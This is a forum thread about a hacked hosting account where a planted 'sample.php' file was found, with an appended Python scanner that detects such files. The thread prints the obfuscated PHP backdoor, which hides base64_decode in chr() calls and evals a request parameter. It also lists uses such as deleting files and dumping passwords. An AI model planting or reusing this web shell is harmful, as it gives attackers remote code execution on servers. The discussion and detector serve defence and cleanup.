I just spoke with my hosting Live Chat. I couldn’t see the headers in the e-mail. The guy said it appears to be from Amazon. Not malicious. When I Google the script, however, it comes up “attack and defence” (sic) script.
Sorry … I meant Google linked ‘sam’ with simple ad manager. I don’t use Simple Ad Manager. But, yeah, it appears as if a start-from-scratch strategy is the best.
In this case it is being used to make base64_decode not be easily noticeable.
As for Amazon, no benefit that I can see. Why would they want to hide that if it’s legit?
If a script-kiddie on the other hand, it would make them feel “clever” and it would get by filters that look for the use of that function name as a string.
Irony is that most look for the function name “eval” so it’s moot here. The code will still trigger a red flag.
That… would be a security hole a mile wide. eval(base64_decode($_REQUEST[sam]));… “Take WHATEVER I put on the URL in the ‘sam’ variable and execute it. Whatever it is.” sam = “unlink(index.php)”? Blow up your index file. Dump your password file to the screen? Sure thing! Open up a hole into your database? Not a problem.
waited (I have been having problems with my host’s cpanel directory-password protection option)
I just re-checked the site, and there is a ‘sample’ PHP file on there, and it contains the one line: < … script language=“php”>
$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
eval($a($_REQUEST[sam]));
So email Amazon’s spoofer email (stop-spoofing@amazon.com), attach the email in question, and tell them that someone appears to be using one of their clients’ contact systems as an attempt at hacking a site. (Though why the email came to YOU is a good question.)
Why it came to me? Not sure why me specifically. My hosting account was suspended recently due to a high volume of CPU usage. These were just portfolio-type design sites, so I went through and deleted all the files and deleted the WordPress installation. I changed the FTP password, but evidently my master account pw has been obtained because within 2 hours, this maddening sample.php file has appeared.
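For anyone cleaning up a site in the same state, here is an added example (not code from any poster in this thread) of the check discussed above: it decodes chr() chains so a hidden function name such as base64_decode becomes visible, and flags any eval() whose argument reaches request input. The function names, the SUSPECT list and the sample string (built from the two lines quoted in the thread) are assumptions made for the illustration.

```python
import re

# Function names worth flagging when they are hidden (defender-chosen list, an assumption).
SUSPECT = {"base64_decode", "gzinflate", "str_rot13", "assert", "system"}
CHAIN = r"chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*"
ASSIGN = re.compile(r"\$(\w+)\s*=\s*(" + CHAIN + r")\s*;", re.I)
EVAL = re.compile(r"\beval\s*\((.*?)\)\s*;", re.I | re.S)
INPUT = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")
VARCALL = re.compile(r"\$(\w+)\s*\(")

def decode_chain(expr):
    """Turn chr(98).chr(97)... into the string it builds at runtime."""
    return "".join(chr(int(n)) for n in re.findall(r"chr\(\s*(\d+)\s*\)", expr, re.I))

def scan_php(source):
    """Return (rule, detail) findings for one PHP source string."""
    findings, hidden = [], {}
    # Pass 1: variables assigned a chr() chain, decoded to plain text.
    for m in ASSIGN.finditer(source):
        name = decode_chain(m.group(2))
        hidden[m.group(1)] = name
        if name.lower() in SUSPECT:
            findings.append(("hidden-function-name", "$%s = %s" % (m.group(1), name)))
    # Pass 2: eval() fed by request input, with variable calls resolved.
    for m in EVAL.finditer(source):
        args = m.group(1)
        if not INPUT.search(args):
            continue
        resolved = VARCALL.sub(
            lambda v: hidden.get(v.group(1), "$" + v.group(1)) + "(", args)
        findings.append(("eval-of-request-input", "eval(%s)" % resolved))
    return findings

# Constructed sample: the two lines quoted in the thread, as a string (never executed).
SAMPLE = (
    "$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95)"
    ".chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);\n"
    "eval($a($_REQUEST[sam]));\n"
)

if __name__ == "__main__":
    for rule, detail in scan_php(SAMPLE):
        print(rule, "->", detail)
```

The scanner only reads the file as text, so it is safe to run over a copy of a compromised web root before wiping it.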